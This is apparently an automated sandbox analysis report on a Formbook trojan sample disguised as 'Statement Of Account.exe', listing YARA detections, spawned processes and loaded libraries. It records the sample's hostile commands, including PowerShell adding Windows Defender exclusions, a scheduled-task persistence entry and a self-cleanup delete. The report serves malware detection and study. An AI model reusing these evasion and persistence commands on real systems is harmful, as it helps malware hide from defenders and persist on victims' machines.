Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Statement Of Account.exe PID: 6744, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: SdYCcXyq.exe PID: 7408, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7572, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cmstp.exe PID: 7592, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 7600, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Statement Of Account.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SdYCcXyq.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.cs | Security API names: _0020.SetAccessControl
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, DNVkJFlCDXXcvsoDnF.cs | Security API names: _0020.AddAccessRule
Source: 0.2.Statement Of Account.exe.4d58248.4.raw.unpack, Lh6ggwKHWj9TAIWXF7.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, Lh6ggwKHWj9TAIWXF7.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.cs | Security API names: _0020.SetAccessControl
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Statement Of Account.exe.a290000.8.raw.unpack, DNVkJFlCDXXcvsoDnF.cs | Security API names: _0020.AddAccessRule
Source: classification engine | Classification label: mal100.troj.evad.winEXE@227/15@4/3
Source: C:\Users\user\Desktop\Statement Of Account.exe | File created: C:\Users\user\AppData\Roaming\SdYCcXyq.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03
Source: C:\Users\user\Desktop\Statement Of Account.exe | File created: C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp
Source: Statement Of Account.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Statement Of Account.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Statement Of Account.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Statement Of Account.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Statement Of Account.exe | ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\Statement Of Account.exe | File read: C:\Users\user\Desktop\Statement Of Account.exe:Zone.Identifier
Source: unknown | Process created: C:\Users\user\Desktop\Statement Of Account.exe "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Users\user\Desktop\Statement Of Account.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Statement Of Account.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SdYCcXyq.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Statement Of Account.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Statement Of Account.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\SdYCcXyq.exe C:\Users\user\AppData\Roaming\SdYCcXyq.exe
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmpAA00.tmp"
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: cmutil.dll
Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: colorui.dll
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: mscms.dll
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: coloradapterclient.dll
Source: C:\Users\user\Desktop\Statement Of Account.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Statement Of Account.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Statement Of Account.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Statement Of Account.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Statement Of Account.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: colorcpl.pdbGCTL | source: RegSvcs.exe, 00000008.00000002.1773088883.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1776322578.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1776739813.0000000000860000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: cmstp.pdbGCTL | source: RegSvcs.exe, 0000000E.00000002.1776807275.0000000001830000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1770468836.0000000001028000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000F.00000002.2937098293.00000000000D0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: colorcpl.pdb | source: RegSvcs.exe, 00000008.00000002.1773088883.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1776322578.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1776739813.0000000000860000.00000040.80000000.00040000.00000000.sdmp
